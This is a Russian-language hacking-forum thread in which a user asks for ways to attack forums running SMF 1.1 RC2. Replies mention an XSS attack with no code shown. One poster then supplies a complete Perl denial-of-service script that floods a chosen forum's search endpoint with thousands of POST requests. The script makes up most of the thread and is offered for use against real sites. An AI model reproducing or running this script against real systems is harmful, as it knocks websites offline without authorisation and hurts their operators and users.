Форумы Smf 1.1 Rc2

Discussion in 'Уязвимости CMS/форумов' started by TERYS, 9 Jul 2006.

  1. TERYS

    TERYS Member

    Joined:
    11 Jan 2006
    Messages:
    77
    Likes Received:
    22
    Reputations:
    -2
    Люди подскажите каикето уязвимости в этом форуме Smf 1.1 Rc2 ! жду..
     
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Я не знаю сработает ли эта уязвимость на Smf 1.1 Rc2 но попробуй выполнить XSS нападение с этим кодом :
     
  3. a1nt

    a1nt Elder - Старейшина

    Joined:
    16 Dec 2005
    Messages:
    131
    Likes Received:
    39
    Reputations:
    25
    Вообще очень надежный форум. Последняя уязвимость была замечена где-то год назад. И все.
     
  4. TERYS

    TERYS Member

    Joined:
    11 Jan 2006
    Messages:
    77
    Likes Received:
    22
    Reputations:
    -2
    Этот код просто в сообщение вписать?
    Как потом можно будет им воспользоватся?
     
  5. CMD

    CMD New Member

    Joined:
    21 Jun 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Вот тебе Dos exploit выполненый на перле.
    Code:
    #!/usr/bin/perl
    use IO::Socket;
    print q{
    ################################################## ##########
    # CMD#
    ################################################## ##########
    };
    $rand=rand(10);
    print "Forum Host: ";
    $serv = <stdin>;
    chop ($serv);
    print "Forum Path: ";
    $path = <stdin>;
    chop ($path);
    for ($i=0; $i<9999; $i++)
    {
    $postit = "search=Albanian+Hackers+Group+Proof+of+Concept+$x+ &search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
    
    $lrg = length $postit; 
    
    my $sock = new IO::Socket::INET ( 
    PeerAddr => "$serv", 
    PeerPort => "80", 
    Proto => "tcp", 
    ); 
    die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 
    
    print $sock "POST $path"."index.php?action=search2 HTTP/1.1\n"; 
    print $sock "Host: $serv\n"; 
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
    print $sock "Referer: $serv\n"; 
    print $sock "Accept-Language: en-us\n"; 
    print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
    print $sock "Accept-Encoding: gzip, deflate\n"; 
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
    print $sock "Connection: Keep-Alive\n"; 
    print $sock "Cache-Control: no-cache\n"; 
    print $sock "Content-Length: $lrg\n\n"; 
    print $sock "$postit\n"; 
    close($sock); 
    
    ## Print a "+" for every loop 
    syswrite STDOUT, "+"; 
    }
    print "Forum shuld be Dosed. Check it out...\n";